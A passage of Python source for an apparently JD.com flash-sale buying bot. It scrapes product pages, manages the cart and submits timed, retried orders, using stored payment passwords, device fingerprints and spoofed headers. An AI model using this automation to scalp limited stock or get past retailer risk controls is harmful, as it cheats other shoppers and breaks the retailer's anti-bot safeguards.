stock = False break return stock def get_multi_item_stock_new(self, sku_ids, area): """获取多个商品库存状态(新) 当所有商品都有货,返回True;否则,返回False。 :param sku_ids: 多个商品的id。可以传入中间用英文逗号的分割字符串,如"123,456" :param area: 地区id :return: 多个商品是否同时有货 True/False """ items_dict = parse_sku_id(sku_ids=sku_ids) area_id = parse_area_id(area=area) url = 'https://c0.3.cn/stocks' payload = { 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'type': 'getstocks', 'skuIds': ','.join(items_dict.keys()), 'area': area_id, '_': str(int(time.time() * 1000)) } headers = { 'User-Agent': self.user_agent } resp_text = '' try: resp_text = requests.get(url=url, params=payload, headers=headers, timeout=self.timeout).text stock = True for sku_id, info in parse_json(resp_text).items(): sku_state = info.get('skuState') # 商品是否上架 stock_state = info.get('StockState') # 商品库存状态 if sku_state == 1 and stock_state in (33, 40): continue else: stock = False break return stock except requests.exceptions.Timeout: logger.error('查询 %s 库存信息超时(%ss)', list(items_dict.keys()), self.timeout) return False except requests.exceptions.RequestException as request_exception: logger.error('查询 %s 库存信息发生网络请求异常:%s', list(items_dict.keys()), request_exception) return False except Exception as e: logger.error('查询 %s 库存信息发生异常, resp: %s, exception: %s', list(items_dict.keys()), resp_text, e) return False def _if_item_removed(self, sku_id): """判断商品是否下架 :param sku_id: 商品id :return: 商品是否下架 True/False """ detail_page = self._get_item_detail_page(sku_id=sku_id) return '该商品已下柜' in detail_page.text @check_login def if_item_can_be_ordered(self, sku_ids, area): """判断商品是否能下单 :param sku_ids: 商品id,多个商品id中间使用英文逗号进行分割 :param area: 地址id :return: 商品是否能下单 True/False """ items_dict = parse_sku_id(sku_ids=sku_ids) area_id = parse_area_id(area) # 判断商品是否能下单 if len(items_dict) > 1: return self.get_multi_item_stock_new(sku_ids=items_dict, area=area_id) sku_id, count = list(items_dict.items())[0] return self.get_single_item_stock(sku_id=sku_id, num=count, area=area_id) def get_item_price(self, sku_id): """获取商品价格 :param sku_id: 商品id :return: 价格 """ url = 'http://p.3.cn/prices/mgets' payload = { 'type': 1, 'pduid': int(time.time() * 1000), 'skuIds': 'J_' + sku_id, } resp = self.sess.get(url=url, params=payload) return parse_json(resp.text).get('p') @check_login def add_item_to_cart(self, sku_ids): """添加商品到购物车 重要: 1.商品添加到购物车后将会自动被勾选✓中。 2.在提交订单时会对勾选的商品进行结算。 3.部分商品(如预售、下架等)无法添加到购物车 京东购物车可容纳的最大商品种数约为118-120种,超过数量会加入购物车失败。 :param sku_ids: 商品id,格式:"123" 或 "123,456" 或 "123:1,456:2"。若不配置数量,默认为1个。 :return: """ add_cart_request = self.request_info['add_cart_request'] for sku_id, count in parse_sku_id(sku_ids=sku_ids).items(): payload = { 'pid': sku_id, 'pcount': count, 'ptype': 1, } add_cart_request(payload) @check_login def clear_cart(self): """清空购物车 包括两个请求: 1.选中购物车中所有的商品 2.批量删除 :return: 清空购物车结果 True/False """ # 1.select all items 2.batch remove items select_url = 'https://cart.jd.com/selectAllItem.action' remove_url = 'https://cart.jd.com/batchRemoveSkusFromCart.action' data = { 't': 0, 'outSkus': '', 'random': random.random(), } try: select_resp = self.sess.post(url=select_url, data=data) time.sleep(2) remove_resp = self.sess.post(url=remove_url, data=data) if (not response_status(select_resp)) or (not response_status(remove_resp)): logger.error('购物车清空失败') return False logger.info('购物车清空成功') return True except Exception as e: logger.error(e) return False @check_login def get_cart_detail(self): """获取购物车商品详情 :return: 购物车商品信息 dict """ url = 'https://cart.jd.com/cart.action' resp = self.sess.get(url) soup = BeautifulSoup(resp.text, "html.parser") cart_detail = dict() for item in soup.find_all(class_='item-item'): try: sku_id = item['skuid'] # 商品id # 例如:['increment', '8888', '100001071956', '1', '13', '0', '50067652554'] # ['increment', '8888', '100002404322', '2', '1', '0'] item_attr_list = item.find(class_='increment')['id'].split('_') p_type = item_attr_list[4] promo_id = target_id = item_attr_list[-1] if len(item_attr_list) == 7 else 0 cart_detail[sku_id] = { 'name': get_tag_value(item.select('div.p-name a')), # 商品名称 'verder_id': item['venderid'], # 商家id 'count': int(item['num']), # 数量 'unit_price': get_tag_value(item.select('div.p-price strong'))[1:], # 单价 'total_price': get_tag_value(item.select('div.p-sum strong'))[1:], # 总价 'is_selected': 'item-selected' in item['class'], # 商品是否被勾选 'p_type': p_type, 'target_id': target_id, 'promo_id': promo_id } except Exception as e: logger.error("某商品在购物车中的信息无法解析,报错信息: %s,该商品自动忽略。 %s", e, item) logger.info('购物车信息:%s', cart_detail) return cart_detail def _cancel_select_all_cart_item(self): """取消勾选购物车中的所有商品 :return: 取消勾选结果 True/False """ url = "https://cart.jd.com/cancelAllItem.action" data = { 't': 0, 'outSkus': '', 'random': random.random() # 'locationId' can be ignored } resp = self.sess.post(url, data=data) return response_status(resp) def _change_item_num_in_cart(self, sku_id, vender_id, num, p_type, target_id, promo_id): """修改购物车商品的数量 修改购物车中商品数量后,该商品将会被自动勾选上。 :param sku_id: 商品id :param vender_id: 商家id :param num: 目标数量 :param p_type: 商品类型(可能) :param target_id: 参数用途未知,可能是用户判断优惠 :param promo_id: 参数用途未知,可能是用户判断优惠 :return: 商品数量修改结果 True/False """ url = "https://cart.jd.com/changeNum.action" data = { 't': 0, 'venderId': vender_id, 'pid': sku_id, 'pcount': num, 'ptype': p_type, 'targetId': target_id, 'promoID': promo_id, 'outSkus': '', 'random': random.random(), # 'locationId' } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://cart.jd.com/cart', } resp = self.sess.post(url, data=data, headers=headers) return json.loads(resp.text)['sortedWebCartResult']['achieveSevenState'] == 2 def _add_or_change_cart_item(self, cart, sku_id, count): """添加商品到购物车,或修改购物车中商品数量 如果购物车中存在该商品,会修改该商品的数量并勾选;否则,会添加该商品到购物车中并勾选。 :param cart: 购物车信息 dict :param sku_id: 商品id :param count: 商品数量 :return: 运行结果 True/False """ if sku_id in cart: logger.info('%s 已在购物车中,调整数量为 %s', sku_id, count) cart_item = cart.get(sku_id) return self._change_item_num_in_cart( sku_id=sku_id, vender_id=cart_item.get('vender_id'), num=count, p_type=cart_item.get('p_type'), target_id=cart_item.get('target_id'), promo_id=cart_item.get('promo_id') ) else: logger.info('%s 不在购物车中,开始加入购物车,数量 %s', sku_id, count) return self.add_item_to_cart(sku_ids={sku_id: count}) @check_login def get_checkout_page_detail(self): """获取订单结算页面信息 该方法会返回订单结算页面的详细信息:商品名称、价格、数量、库存状态等。 :return: 结算信息 dict """ get_checkout_page_request = self.request_info['get_checkout_page_request'] payload = { 'rid': str(int(time.time() * 1000)), } get_checkout_page_request(payload) def _save_invoice(self): """下单第三方商品时如果未设置发票,将从电子发票切换为普通发票 http://jos.jd.com/api/complexTemplate.htm?webPamer=invoice&groupName=%E5%BC%80%E6%99%AE%E5%8B%92%E5%85%A5%E9%A9%BB%E6%A8%A1%E5%BC%8FAPI&id=566&restName=jd.kepler.trade.submit&isMulti=true :return: """ url = 'https://trade.jd.com/shopping/dynamic/invoice/saveInvoice.action' data = { "invoiceParam.selectedInvoiceType": 1, "invoiceParam.companyName": "个人", "invoiceParam.invoicePutType": 0, "invoiceParam.selectInvoiceTitle": 4, "invoiceParam.selectBookInvoiceContent": "", "invoiceParam.selectNormalInvoiceContent": 1, "invoiceParam.vatCompanyName": "", "invoiceParam.code": "", "invoiceParam.regAddr": "", "invoiceParam.regPhone": "", "invoiceParam.regBank": "", "invoiceParam.regBankAccount": "", "invoiceParam.hasCommon": "true", "invoiceParam.hasBook": "false", "invoiceParam.consigneeName": "", "invoiceParam.consigneePhone": "", "invoiceParam.consigneeAddress": "", "invoiceParam.consigneeProvince": "请选择:", "invoiceParam.consigneeProvinceId": "NaN", "invoiceParam.consigneeCity": "请选择", "invoiceParam.consigneeCityId": "NaN", "invoiceParam.consigneeCounty": "请选择", "invoiceParam.consigneeCountyId": "NaN", "invoiceParam.consigneeTown": "请选择", "invoiceParam.consigneeTownId": 0, "invoiceParam.sendSeparate": "false", "invoiceParam.usualInvoiceId": "", "invoiceParam.selectElectroTitle": 4, "invoiceParam.electroCompanyName": "undefined", "invoiceParam.electroInvoiceEmail": "", "invoiceParam.electroInvoicePhone": "", "invokeInvoiceBasicService": "true", "invoice_ceshi1": "", "invoiceParam.showInvoiceSeparate": "false", "invoiceParam.invoiceSeparateSwitch": 1, "invoiceParam.invoiceCode": "", "invoiceParam.saveInvoiceFlag": 1 } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://trade.jd.com/shopping/dynamic/invoice/saveInvoice.action', } self.sess.post(url=url, data=data, headers=headers) @check_login def submit_order(self): """提交订单 重要: 1.该方法只适用于普通商品的提交订单(即可以加入购物车,然后结算提交订单的商品) 2.提交订单时,会对购物车中勾选✓的商品进行结算(如果勾选了多个商品,将会提交成一个订单) :return: True/False 订单提交结果 """ submit_order_request = self.request_info['submit_order_request'] return submit_order_request() @check_login def submit_order_with_retry(self, retry=3, interval=4): """提交订单,并且带有重试功能 :param retry: 重试次数 :param interval: 重试间隔 :return: 订单提交结果 True/False """ for i in range(1, retry + 1): logger.info('第[%s/%s]次尝试提交订单', i, retry) self.get_checkout_page_detail() if self.submit_order(): logger.info('第%s次提交订单成功', i) return True else: if i < retry: logger.info('第%s次提交失败,%ss后重试', i, interval) time.sleep(interval) else: logger.info('重试提交%s次结束', retry) return False @check_login def submit_order_by_time(self, buy_time, retry=4, interval=5): """定时提交商品订单 重要:该方法只适用于普通商品的提交订单,事先需要先将商品加入购物车并勾选✓。 :param buy_time: 下单时间,例如:'2018-09-28 22:45:50.000' :param retry: 下单重复执行次数,可选参数,默认4次 :param interval: 下单执行间隔,可选参数,默认5秒 :return: """ t = Timer(buy_time=buy_time) t.start() for count in range(1, retry + 1): logger.info('第[%s/%s]次尝试提交订单', count, retry) if self.submit_order(): break logger.info('休息%ss', interval) time.sleep(interval) else: logger.info('执行结束,提交订单失败!') @check_login def get_order_info(self, unpaid=True): """查询订单信息 :param unpaid: 只显示未付款订单,可选参数,默认为True :return: """ url = 'https://order.jd.com/center/list.action' payload = { 'search': 0, 'd': 1, 's': 4096, } # Orders for nearly three months headers = { 'User-Agent': self.user_agent, 'Referer': 'https://passport.jd.com/uc/login?ltype=logout', } try: resp = self.sess.get(url=url, params=payload, headers=headers) if not response_status(resp): logger.error('获取订单页信息失败') return soup = BeautifulSoup(resp.text, "html.parser") logger.info('************************订单列表页查询************************') order_table = soup.find('table', {'class': 'order-tb'}) table_bodies = order_table.select('tbody') exist_order = False for table_body in table_bodies: # get order status order_status = get_tag_value(table_body.select('span.order-status')).replace("订单状态:", "") # check if order is waiting for payment # wait_payment = bool(table_body.select('a.btn-pay')) wait_payment = "等待付款" in order_status # only show unpaid orders if unpaid=True if unpaid and (not wait_payment): continue exist_order = True # get order_time, order_id tr_th = table_body.select('tr.tr-th')[0] order_time = get_tag_value(tr_th.select('span.dealtime')) order_id = get_tag_value(tr_th.select('span.number a')) # get sum_price, pay_method sum_price = '' pay_method = '' amount_div = table_body.find('div', {'class': 'amount'}) if amount_div: spans = amount_div.select('span') pay_method = get_tag_value(spans, index=1) # if the order is waiting for payment, the price after the discount is shown. sum_price = get_tag_value(amount_div.select('strong'), index=1)[1:] if wait_payment \ else get_tag_value(spans, index=0)[4:] # get name and quantity of items in order items_dict = dict() # {'item_id_1': quantity_1, 'item_id_2': quantity_2, ...} tr_bds = table_body.select('tr.tr-bd') for tr_bd in tr_bds: item = tr_bd.find('div', {'class': 'goods-item'}) if not item: break item_id = item.get('class')[1][2:] quantity = get_tag_value(tr_bd.select('div.goods-number'))[1:] items_dict[item_id] = quantity order_info_format = '下单时间:{0}----订单号:{1}----商品列表:{2}----订单状态:{3}----总金额:{4}元----付款方式:{5}' logger.info(order_info_format.format(order_time, order_id, parse_items_dict(items_dict), order_status, sum_price, pay_method)) if not exist_order: logger.info('订单查询为空') except Exception as e: logger.error(e) @deprecated def _get_seckill_url(self, sku_id, server_buy_time=int(time.time())): """获取商品的抢购链接 点击"抢购"按钮后,会有两次302跳转,最后到达订单结算页面 这里返回第一次跳转后的页面url,作为商品的抢购链接 :param sku_id: 商品id :return: 商品的抢购链接 """ url = 'https://itemko.jd.com/itemShowBtn' payload = { 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'from': 'pc', '_': str(server_buy_time * 1000), } headers = { 'User-Agent': self.user_agent, 'Host': 'itemko.jd.com', 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } retry_interval = global_config.retry_interval retry_count = 0 while retry_count < 10: resp = self.sess.get(url=url, headers=headers, params=payload, timeout=(0.1, 0.08)) resp_json = parse_json(resp.text) if resp_json.get('url'): # https://divide.jd.com/user_routing?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc router_url = 'https:' + resp_json.get('url') # https://marathon.jd.com/captcha.html?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc seckill_url = router_url.replace('divide', 'marathon').replace('user_routing', 'captcha.html') logger.info("抢购链接获取成功: %s", seckill_url) return seckill_url else: retry_count += 1 logger.info("第%s次获取抢购链接失败,%s不是抢购商品或抢购页面暂未刷新,%s秒后重试", retry_count, sku_id, retry_interval) time.sleep(retry_interval) logger.error("抢购链接获取失败,终止抢购!") exit(-1) def request_seckill_url(self, sku_id, server_buy_time): """访问商品的抢购链接(用于设置cookie等) :param sku_id: 商品id :return: """ if not self.seckill_url.get(sku_id): seckill_url = self.request_info['get_sku_seckill_url_request'](sku_id, server_buy_time) if seckill_url is not None: self.seckill_url[sku_id] = seckill_url else: return None return self.request_info['request_sku_seckill_url_request'](sku_id) @deprecated def request_seckill_checkout_page(self, sku_id, num=1): """访问抢购订单结算页面 :param sku_id: 商品id :param num: 购买数量,可选参数,默认1个 :return: """ url = 'https://marathon.jd.com/seckill/seckill.action' payload = { 'skuId': sku_id, 'num': num, 'rid': int(time.time()) } headers = { 'User-Agent': self.user_agent, 'Host': 'marathon.jd.com', 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } self.sess.get(url=url, params=payload, headers=headers, timeout=(0.1, 0.08)) def _get_seckill_init_info(self, sku_id, num=1): """获取秒杀初始化信息(包括:地址,发票,token) :param sku_id: :param num: 购买数量,可选参数,默认1个 :return: 初始化信息组成的dict """ count = 1 while count < 8: logger.info('第 %s 次获取秒杀初始化信息', count) content = self.request_info['get_seckill_init_info_request'](sku_id, num) try: if 'koFail' in content: logger.error('抢购失败,请求重定向,地址:%s', content) else: return parse_json(content) except Exception as e: logger.error('获取秒杀初始化信息失败,响应数据:%s,异常:%s', content, e) count += 1 def _gen_seckill_order_data(self, sku_id, num=1): """生成提交抢购订单所需的请求体参数 :param sku_id: 商品id :param num: 购买数量,可选参数,默认1个 :return: 请求体参数组成的dict """ # 获取用户秒杀初始化信息 init_info = self.seckill_init_info.get(sku_id) if not init_info: init_info = self._get_seckill_init_info(sku_id) self.seckill_init_info[sku_id] = init_info default_address = init_info['addressList'][0] # 默认地址dict invoice_info = init_info.get('invoiceInfo', {}) # 默认发票信息dict, 有可能不返回 token = init_info['token'] data = { 'skuId': sku_id, 'num': num, 'addressId': default_address['id'], 'yuShou': str(bool(int(init_info['seckillSkuVO']['extMap'].get('YuShou', '0')))).lower(), 'isModifyAddress': 'false', 'name': default_address['name'], 'provinceId': default_address['provinceId'], 'cityId': default_address['cityId'], 'countyId': default_address['countyId'], 'townId': default_address['townId'], 'addressDetail': default_address['addressDetail'], 'mobile': default_address['mobile'], 'mobileKey': default_address['mobileKey'], 'email': default_address.get('email', ''), 'postCode': '', 'invoiceTitle': invoice_info.get('invoiceTitle', -1), 'invoiceCompanyName': '', 'invoiceContent': invoice_info.get('invoiceContentType', 1), 'invoiceTaxpayerNO': '', 'invoiceEmail': '', 'invoicePhone': invoice_info.get('invoicePhone', ''), 'invoicePhoneKey': invoice_info.get('invoicePhoneKey', ''), 'invoice': 'true' if invoice_info else 'false', 'password': global_config.get('account', 'payment_pwd'), 'codTimeType': 3, 'paymentType': 4, 'areaCode': '', 'overseas': 0, 'phone': '', 'eid': self.eid, 'fp': self.fp, 'token': token, 'pru': '' } return data def exec_seckill(self, sku_id, server_buy_time=int(time.time()), retry=4, interval=4, num=1, fast_mode=True): """立即抢购 抢购商品的下单流程与普通商品不同,不支持加入购物车,可能需要提前预约,主要执行流程如下: 1. 访问商品的抢购链接 2. 访问抢购订单结算页面(好像可以省略这步,待测试) 3. 提交抢购(秒杀)订单 :param sku_id: 商品id :param server_buy_time: 商品指定抢购时间 :param retry: 抢购重复执行次数,可选参数,默认4次 :param interval: 抢购执行间隔,可选参数,默认4秒 :param num: 购买数量,可选参数,默认1个 :param fast_mode: 快速模式:略过访问抢购订单结算页面这一步骤,默认为 True :return: 抢购结果 True/False """ for count in range(1, retry + 1): logger.info('第[%s/%s]次尝试抢购商品:%s', count, retry, sku_id) if not fast_mode: # 访问抢购订单结算页面 self.request_info['request_seckill_checkout_page_request'](sku_id, num) if self.request_info['submit_seckill_order_request'](sku_id, server_buy_time, num): return True else: logger.info('休息%ss', interval) time.sleep(interval) else: logger.info('执行结束,抢购%s失败!', sku_id) return False @check_login def exec_seckill_by_time(self, config): """预约抢购 """ if not config: raise AsstException('初始化配置为空!') self.config = config # 兼容正常流程:开抢前清空购物车 self.clear_cart() items_dict = parse_sku_id(sku_ids=config.sku_id) if self.use_new: server_buy_time, realy_buy_time = self.new_init_seckill_request_method(config.fast_mode, config.is_risk_control) else: # 1.提前初始化预约抢购流程请求信息、方法 server_buy_time, realy_buy_time = self.init_seckill_request_method(config.fast_mode, config.is_risk_control) # 兼容正常流程:初始化正常下单流程请求信息、方法 self.init_default_order_request_method(config.fast_mode, config.is_risk_control) Timer.setSystemTime() # 使用多线程需要从倒计时前开始,后续流程都使用多线程执行 if self.use_new: get_confirm_order_page_request = self.request_info['get_confirm_order_page_request'] submit_order_request = self.request_info['submit_order_request'] def start_func(): # 订单请求页面 for sku_id in items_dict: logger.info('开始抢购商品:%s', sku_id) submit_data = get_confirm_order_page_request(sku_id, server_buy_time) if submit_data is not None: retry = config.retry interval = config.interval for count in range(1, retry + 1): logger.info('第[%s/%s]次尝试提交订单', count, retry) with self.sem: # 下单请求 if submit_order_request(submit_data, count): break logger.info('休息%ss', interval) time.sleep(interval) else: logger.info('执行结束,提交订单失败!') continue else: return None else: def start_func(): # 使用协程/多线程从执行开始 # 3.执行 for sku_id in items_dict: logger.info('开始抢购商品:%s', sku_id) # 获取抢购链接 resp = self.request_seckill_url(sku_id, server_buy_time) if resp is not None: if resp == 'pass': pass elif resp.status == 302: location = resp.headers['location'] logger.info('访问商品抢购链接请求,重定向地址:%s', location) if 'gate.action' in location: # 此处转入正常购物车下单流程 add_cart_request = self.request_info['add_cart_request'] payload = { 'pid': sku_id, 'pcount': config.num, 'ptype': 1, } add_cart_request(payload) # 获取订单结算页面信息 self.get_checkout_page_detail() retry = config.retry interval = config.interval for count in range(1, retry + 1): logger.info('第[%s/%s]次尝试提交订单', count, retry) with self.sem: if self.submit_order(): break logger.info('休息%ss', interval) time.sleep(interval) else: logger.info('执行结束,提交订单失败!') continue # 开始抢购 self.exec_seckill(sku_id, server_buy_time, config.retry, config.interval, int(items_dict[sku_id]), config.fast_mode) self.start_func = start_func # 2.倒计时 logger.info('准备抢购商品:%s', list(items_dict.keys())) Timer(buy_time=realy_buy_time, sleep_interval=config.sleep_interval, fast_sleep_interval=config.fast_sleep_interval, is_sync=False, assistant=self).start() if self.config.fast_mode: self.close_now() def new_parse_item_detail_page(self, sku_id, html): match = re.search(r'"zzz":\"(.*)\"', html) if not match: return False zzz = match.group(1) if zzz is None: return False self.item_zzz[sku_id] = zzz area_id_list = list(map(lambda x: x.strip(), re.split('_|-', self.area_id))) area_url = '' if len(area_id_list) > 2: area_url = area_id_list[0] + '-' + area_id_list[1] + '-' + area_id_list[2] item_url_param = 'sceneval=2&bid=&scene=jd&isCanEdit=1&EncryptInfo=&Token=&type=0&lg=0&supm=0&locationid=' + area_url + '&favorablerate=94' self.item_url_param[sku_id] = item_url_param return True def parse_item_detail_page(self, sku_id, page): match = re.search(r'cat: \[(.*?)\]', page.text) cat = match.group(1) if not cat: return False self.item_cat[sku_id] = cat match = re.search(r'venderId:(\d*?),', page.text) vender_id = match.group(1) self.item_vender_ids[sku_id] = vender_id match = re.search(r'paramJson:( ?)\'(\{.*\})\'', page.text) param_json = match.group(1) if not param_json or param_json == '' or param_json == ' ': param_json = match.group(2) if not param_json: param_json = '' self.param_json[sku_id] = param_json match = re.search(r'specialAttrs:( ?)(\[.*\])', page.text) special_attrs_str = match.group(1) if not special_attrs_str or special_attrs_str == '' or special_attrs_str == ' ': special_attrs_str = match.group(2) if special_attrs_str: special_attrs = json.loads(special_attrs_str) else: special_attrs = [] self.special_attrs[sku_id] = special_attrs return True def new_init_yuyue_buy_time(self, sku_id=None, html=None): config = self.config logger.info('初始化预约抢购时间') # 处理时间 server_buy_datetime = None if config.sku_buy_time: # 根据配置初始化 server_buy_datetime = datetime.strptime(config.sku_buy_time, "%Y-%m-%d %H:%M:%S.%f") else: # 自动获取 match = re.search(r'"yuyue":({.*})', html) if match: yuyue = match.group(1) if yuyue: yuyue_json = parse_json(yuyue) buy_start_time = yuyue_json['qiangStime'] if buy_start_time: buy_end_time = yuyue_json['qiangEtime'] server_buy_datetime = datetime.strptime(buy_start_time, "%Y-%m-%d %H:%M:%S") logger.info('商品%s预约抢购,开始时间:%s,结束时间:%s', sku_id, buy_start_time, buy_end_time) else: logger.debug(f"响应数据:{html}") logger.info("商品%s无法获取预约抢购时间,请重新设置sku_id", sku_id) exit(-1) else: logger.info("商品%s不是 预约抢购商品 或 未开始预约,请重新设置sku_id", sku_id) exit(-1) return int(time.mktime(server_buy_datetime.timetuple())), ( server_buy_datetime + timedelta(milliseconds=-config.buy_time_offset)).strftime( "%Y-%m-%d %H:%M:%S.%f") def init_yuyue_buy_time(self, sku_id=None, header=None, payload=None): if header is None: header = dict() config = self.config logger.info('初始化预约抢购时间') # 处理时间 server_buy_datetime = None if config.sku_buy_time: # 根据配置初始化 server_buy_datetime = datetime.strptime(config.sku_buy_time, "%Y-%m-%d %H:%M:%S.%f") else: # 自动初始化 header['Host'] = 'itemko.jd.com' header['Referer'] = 'https://item.jd.com/' resp = http_util.send_http_request(self.socket_client, url='https://item-soa.jd.com/getWareBusiness', method='GET', headers=header, params=payload, cookies=self.get_cookies_str_by_domain_or_path( 'item-soa.jd.com')) resp_data = resp.body resp_json = parse_json(resp_data) yuyue_info = resp_json.get('yuyueInfo') if yuyue_info: buy_time = yuyue_info.get('buyTime') if buy_time: buy_time_list = re.findall(r'\d{4}-\d{1,2}-\d{1,2} \d{1,2}:\d{1,2}', buy_time.strip()) if buy_time_list and len(buy_time_list) == 2: buy_start_time = buy_time_list[0] buy_end_time = buy_time_list[1] server_buy_datetime = datetime.strptime(buy_start_time, "%Y-%m-%d %H:%M") logger.info('商品%s预约抢购,开始时间:%s,结束时间:%s', sku_id, buy_start_time, buy_end_time) else: if resp_data: logger.info(f"响应数据:{resp_data}") logger.info("商品%s无法获取预约抢购时间,请重新设置sku_id", sku_id) exit(-1) else: if resp_data: logger.info(f"响应数据:{resp_data}") logger.info("商品%s无法获取预约抢购时间,请重新设置sku_id", sku_id) exit(-1) else: logger.info("商品%s不是 预约抢购商品 或 未开始预约,请重新设置sku_id", sku_id) exit(-1) return int(time.mktime(server_buy_datetime.timetuple())), ( server_buy_datetime + timedelta(milliseconds=-config.buy_time_offset)).strftime( "%Y-%m-%d %H:%M:%S.%f") def init_seckill_request_method(self, fast_mode, is_risk_control): # 提前初始化请求信息、方法 # self.get_and_update_cookies_str() config = self.config sku_id = config.sku_id area_id = parse_area_id(self.area_id) cat = self.item_cat.get(sku_id) retry_count = 0 while not cat: retry_count += 1 logger.info('第 %s 次获取商品页信息', retry_count) page = self._get_item_detail_page(sku_id) if not self.parse_item_detail_page(sku_id, page): if retry_count > 10: logger.error('无法获取cat,超出重试次数,抢购停止') exit(-1) else: logger.error('第 %s 次获取商品页信息失败:%s', page) time.sleep(1) continue else: cat = self.item_cat.get(sku_id) vender_id = self.item_vender_ids.get(sku_id) param_json = self.param_json.get(sku_id) special_attrs = self.special_attrs.get(sku_id) # 初始化预约抢购时间 server_buy_time, realy_buy_time = self.init_yuyue_buy_time(sku_id, self.headers.copy(), { # 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'cat': cat, 'area': area_id, 'shopId': vender_id, 'venderId': vender_id, 'paramJson': param_json, 'num': 1, }) # 初始化获取商品抢购链接请求方法 get_sku_seckill_url_request_headers = self.headers.copy() if fast_mode: get_sku_seckill_url_request_headers['Host'] = 'itemko.jd.com' if 'isKO' in special_attrs: def get_sku_seckill_url_request(sku_id, server_buy_time=int(time.time())): logger.info('获取抢购链接') payload = { # 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'from': 'pc', '_': str(server_buy_time * 1000), } get_sku_seckill_url_request_headers['Referer'] = f'https://item.jd.com/{sku_id}.html' retry_interval = config.retry_interval retry_count = 0 while not self.seckill_url.get(sku_id): if retry_count >= 10: logger.error("抢购链接获取失败,终止抢购!") exit(-1) try: resp = http_util.send_http_request(self.socket_client, url='https://itemko.jd.com/itemShowBtn', method='GET', headers=get_sku_seckill_url_request_headers, params=payload , cookies=self.get_cookies_str_by_domain_or_path( 'itemko.jd.com')) resp_data = resp.body resp_json = parse_json(resp_data) if resp_json.get('url'): # https://divide.jd.com/user_routing?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc router_url = 'https:' + resp_json.get('url') # https://marathon.jd.com/captcha.html?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc seckill_url = router_url.replace('divide', 'marathon').replace('user_routing', 'captcha.html') logger.info("抢购链接获取成功: %s", seckill_url) return seckill_url else: retry_count += 1 if resp_data: logger.info(f"响应数据:{resp_data}") logger.info("商品%s第%s次获取抢购链接失败,链接为空,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) except Exception as e: retry_count += 1 logger.error("异常信息:%s", e) logger.info("商品%s第%s次获取抢购链接失败,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) else: def get_sku_seckill_url_request(sku_id, server_buy_time=int(time.time())): logger.info('获取抢购链接') payload = { # 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'cat': cat, 'area': area_id, 'shopId': vender_id, 'venderId': vender_id, 'paramJson': param_json, 'num': 1, } get_sku_seckill_url_request_headers['Referer'] = 'https://item.jd.com/' retry_interval = config.retry_interval retry_count = 0 while not self.seckill_url.get(sku_id): if retry_count >= 10: logger.error("抢购链接获取失败,终止抢购!") exit(-1) try: resp = http_util.send_http_request(self.socket_client, url='https://item-soa.jd.com/getWareBusiness', method='GET', headers=get_sku_seckill_url_request_headers, params=payload, cookies=self.get_cookies_str_by_domain_or_path( 'item-soa.jd.com')) resp_data = resp.body resp_json = parse_json(resp_data) yuyue_info = resp_json.get('yuyueInfo') if yuyue_info: # https://divide.jd.com/user_routing?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc url = yuyue_info.get('url') if url: if 'toYuyue.action' in url: retry_count += 1 logger.info("商品%s正在预约中,暂未开始抢购,开始第%s次重试", sku_id, retry_count) continue router_url = 'https:' + url # https://marathon.jd.com/captcha.html?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc seckill_url = router_url.replace('divide', 'marathon').replace('user_routing', 'captcha.html') logger.info("抢购链接获取成功: %s", seckill_url) return seckill_url else: retry_count += 1 if resp_data: logger.info(f"响应数据:{resp_data}") logger.info("商品%s第%s次获取抢购链接失败,链接为空,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) else: if resp_data: logger.info(f"响应数据:{resp_data}") logger.info("商品%s不是 预约抢购商品 或 未开始预约,本次抢购结束", sku_id) exit(-1) except Exception as e: retry_count += 1 logger.error("异常信息:%s", e) logger.info("商品%s第%s次获取抢购链接失败,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) return None else: def get_sku_seckill_url_request(sku_id, server_buy_time=int(time.time())): url = 'https://itemko.jd.com/itemShowBtn' payload = { 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'from': 'pc', '_': str(server_buy_time * 1000), } headers = { 'User-Agent': self.user_agent, 'Host': 'itemko.jd.com', 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } retry_interval = 0.2 retry_count = 0 while retry_count < 10: try: resp = self.sess.get(url=url, headers=headers, params=payload, timeout=(0.1, 0.08)) resp_json = parse_json(resp.text) if resp_json.get('url'): # https://divide.jd.com/user_routing?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc router_url = 'https:' + resp_json.get('url') # https://marathon.jd.com/captcha.html?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc seckill_url = router_url.replace('divide', 'marathon').replace('user_routing', 'captcha.html') logger.info("抢购链接获取成功: %s", seckill_url) return seckill_url else: retry_count += 1 if resp.text: logger.info(f"响应数据:{resp.text}") logger.info("商品%s第%s次获取抢购链接失败,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) except Exception as e: retry_count += 1 logger.info("异常信息:%s", e) logger.info("商品%s第%s次获取抢购链接失败,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) logger.error("抢购链接获取失败,终止抢购!") exit(-1) self.request_info['get_sku_seckill_url_request'] = get_sku_seckill_url_request # 初始化访问商品抢购链接请求方法(用于设置cookie等) request_sku_seckill_url_request_headers = 